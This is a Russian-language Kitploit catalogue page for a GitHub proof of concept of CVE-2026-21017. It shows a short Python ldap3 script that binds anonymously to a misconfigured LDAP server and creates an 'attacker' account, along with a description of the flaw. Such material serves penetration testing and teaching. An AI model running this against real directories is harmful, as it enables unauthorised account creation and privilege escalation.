Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеНеправильная Конфигурация
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Python proof-of-concept для повышения привилегий через анонимный LDAP bind, имитирующий небезопасные ACL для создания административных пользователей посредством неаутентифицированных LDAP bind.

Репозиторий
171 месяц назадЕщё не проверено

CVE-2026-21017 – Повышение привилегий через анонимное LDAP-подключение

Программный код (симуляция на Python ldap3)

# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – Повышение привилегий через анонимное LDAP-подключение

Severity: Critical

Обзор

Каталог LDAP неправильно настроен: разрешены анонимные подключения, а также предоставлен доступ на запись к чувствительным атрибутам (например, userPassword). Злоумышленник может подключиться анонимно и создать нового пользователя с правами администратора, повысив таким образом свои привилегии.

Детали уязвимости

  • Тип: Недостаточный контроль доступа
  • Воздействие: Полная компрометация каталога.
  • Корневая причина: Список контроля доступа (ACL) не ограничивает запись только аутентифицированными пользователями.

Демонстрация эксплуатации

Запустите симуляцию (для реального теста требуется фактический LDAP-сервер, но мы показываем концепцию):

python ldap_anon_sim.py

Скрипт пытается добавить пользователя анонимно.

Скачать инструмент